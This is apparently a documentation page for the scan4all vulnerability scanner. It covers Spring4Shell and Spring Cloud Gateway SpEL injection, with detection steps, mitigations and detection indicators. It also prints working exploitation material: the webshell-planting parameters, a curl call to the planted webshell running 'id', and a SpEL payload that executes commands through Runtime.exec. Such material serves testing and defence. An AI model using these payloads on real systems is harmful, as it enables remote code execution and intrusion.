Skip to main content

Overview

Spring Framework is one of the most popular Java application frameworks. scan4all includes POCs for critical Spring vulnerabilities, including the infamous Spring4Shell (CVE-2022-22965).
These vulnerabilities affect a massive number of Java applications worldwide. Organizations using Spring Framework should prioritize testing and patching.

Supported Vulnerabilities

CVE-2022-22965 - Spring4Shell

CVE-2022-22965 (Spring4Shell)

TypeRemote Code Execution
Affected VersionsSpring Framework (JDK 9+)
Discovery DateMarch 2022
CVSS Score9.8 (Critical)
Alternative NameSpring4Shell
Description: Spring4Shell is a critical RCE vulnerability in Spring Framework affecting applications running on JDK 9 and above. The vulnerability exploits Spring’s data binding mechanism to gain access to the ClassLoader, allowing attackers to write malicious JSP files and achieve remote code execution. Technical Details:
  • Attack Vector: HTTP parameter pollution via data binding
  • Requirements: JDK 9+ and Apache Tomcat as servlet container
  • Exploitation: Modifies Tomcat’s Access Log Valve pattern to write a webshell
Detection Method: 
// Stage 1: Check if ClassLoader is accessible
GET /?class.module.classLoader[1]=1
// Expected: HTTP 500 (vulnerable)

GET /?class.module.classLoader=1
// Expected: HTTP 200 (vulnerable)
Exploitation Stages:
1

Access ClassLoader

Exploit data binding to access the ClassLoader through class.module.classLoader
2

Modify Access Log Pattern

Change Tomcat’s access log pattern to write a JSP webshell
3

Set Output Directory

Configure the log output to webapps/ROOT directory
4

Trigger Log Write

Make a request that triggers the access log to write the webshell
5

Execute Commands

Access the webshell and execute arbitrary commands
POC Parameters: 
class.module.classLoader.resources.context.parent.pipeline.first.pattern
class.module.classLoader.resources.context.parent.pipeline.first.suffix
class.module.classLoader.resources.context.parent.pipeline.first.directory
class.module.classLoader.resources.context.parent.pipeline.first.prefix
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat
Webshell Output:
  • Filename: tomcatwar.jsp
  • Location: webapps/ROOT/
  • Access: http://target/tomcatwar.jsp?pwd=j&cmd=id
Vulnerable Configuration: 
@Controller
public class VulnerableController {
    @GetMapping("/exploit")
    public String vulnerable(Model model) {
        // Vulnerable to data binding exploitation
        return "view";
    }
}
Verification: 
# Check if webshell was created
curl "http://target/tomcatwar.jsp?pwd=j&cmd=id"

# Expected output:
uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat)

CVE-2022-22947 - Spring Cloud Gateway RCE

CVE-2022-22947

TypeRemote Code Execution
Affected VersionsSpring Cloud Gateway 3.1.1+ and 3.0.7+
Discovery DateMarch 2022
CVSS Score10.0 (Critical)
RequirementActuator endpoint enabled
Description: Spring Cloud Gateway allows remote code execution when the Gateway Actuator endpoint is enabled and exposed. Attackers can inject malicious SpEL (Spring Expression Language) expressions through the /actuator/gateway/routes endpoint. Technical Details:
  • Component: Spring Cloud Gateway Actuator
  • Attack Vector: SpEL (Spring Expression Language) Injection
  • Requirements:
    • /actuator/gateway/routes endpoint enabled
    • Ability to POST to actuator endpoints
Exploitation Process:
1

Create Malicious Route

POST a malicious route definition with SpEL expression to /actuator/gateway/routes/vtest
2

Refresh Gateway

Trigger gateway refresh via POST to /actuator/gateway/refresh
3

Execute Payload

Access the route via GET to /actuator/gateway/routes/vtest to execute the SpEL expression
4

Cleanup

Delete the test route to avoid detection
POC Payload: 
{
  "id": "vtest",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{999*999}"
      }
    }
  ],
  "uri": "http://example.com",
  "order": 0
}
Detection: 
# Step 1: Create route with test payload
curl -X POST http://target/actuator/gateway/routes/vtest \
  -H "Content-Type: application/json" \
  -d '{"id":"vtest","filters":[{"name":"AddResponseHeader","args":{"name":"Result","value":"#{999*999}"}}],"uri":"http://example.com","order":0}'

# Step 2: Refresh gateway
curl -X POST http://target/actuator/gateway/refresh

# Step 3: Check if SpEL executed (998001 = 999*999)
curl http://target/actuator/gateway/routes/vtest

# Step 4: Cleanup
curl -X DELETE http://target/actuator/gateway/routes/vtest
curl -X POST http://target/actuator/gateway/refresh
Command Execution Payload: 
{
  "id": "vtest",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{'id'}).getInputStream()))}"
      }
    }
  ],
  "uri": "http://example.com",
  "order": 0
}
Vulnerable Configuration:
application.yml
management:
  endpoints:
    web:
      exposure:
        include: gateway  # Vulnerable configuration

Usage

Scanning for Spring Vulnerabilities

# Scan a Spring application
scan4all -h http://springapp.example.com

# Scan with POC enabled
scan4all -h http://springapp.example.com -poc

# Test specific CVE
scan4all -h http://springapp.example.com -poc CVE-2022-22965

Identifying Spring Applications

HTTP Headers: 
X-Application-Context: application
Server: Apache Tomcat
Common Endpoints: 
/actuator
/actuator/health
/actuator/gateway/routes
/login
/error
Error Messages: 
Whitelabel Error Page
Spring Framework
org.springframework

Mitigation

CVE-2022-22965 (Spring4Shell)

1

Upgrade Spring Framework

  • Spring Framework 5.3.18+
  • Spring Framework 5.2.20+
  • Spring Boot 2.5.12+ or 2.6.6+
2

Downgrade JDK

If upgrade is not possible, consider using JDK 8 (not vulnerable)
3

Implement WAF Rules

Block requests containing “class.module.classLoader” in parameters
4

Disable Data Binding

Use @InitBinder to disallow Class and ClassLoader access
Workaround Code: 
@ControllerAdvice
public class SecurityConfig {
    @InitBinder
    public void initBinder(WebDataBinder binder) {
        String[] denylist = new String[]{"class.*", "Class.*", "*.class.*", "*.Class.*"};
        binder.setDisallowedFields(denylist);
    }
}

CVE-2022-22947 (Spring Cloud Gateway)

1

Upgrade Spring Cloud Gateway

  • Spring Cloud Gateway 3.1.1+
  • Spring Cloud Gateway 3.0.7+
2

Secure Actuator Endpoints

Restrict access to actuator endpoints using Spring Security
3

Disable Gateway Actuator

If not needed, disable the gateway actuator endpoint
4

Network Segmentation

Only allow trusted networks to access actuator endpoints
Secure Configuration:
application.yml
management:
  endpoints:
    web:
      exposure:
        include: health,info  # Only expose necessary endpoints
  endpoint:
    gateway:
      enabled: false  # Disable if not needed

spring:
  security:
    user:
      name: admin
      password: ${ACTUATOR_PASSWORD}  # Require authentication

Detection Indicators

Network Indicators

Spring4Shell (CVE-2022-22965):
  • Parameters containing class.module.classLoader
  • Long parameter names with multiple dots
  • Requests to suspicious JSP files
  • Parameters referencing pipeline, pattern, directory
Spring Cloud Gateway (CVE-2022-22947):
  • POST requests to /actuator/gateway/routes/*
  • JSON payloads with SpEL expressions #{...}
  • Sequential requests: POST route → POST refresh → GET route
  • Unusual filter names or values in route definitions

Log Patterns

class.module.classLoader
tomcatwar.jsp
/actuator/gateway/routes/
AddResponseHeader
T(java.lang.Runtime)

Source Code Location

pocs_go/Springboot/
├── CVE-2022-22965.go
├── CVE-2022-22965_test.go
└── CVE-2022-22947.go

References

These are among the most critical Java vulnerabilities discovered in recent years. Immediate action is required for affected systems.

Build docs developers (and LLMs) love

Get started for freeTalk to us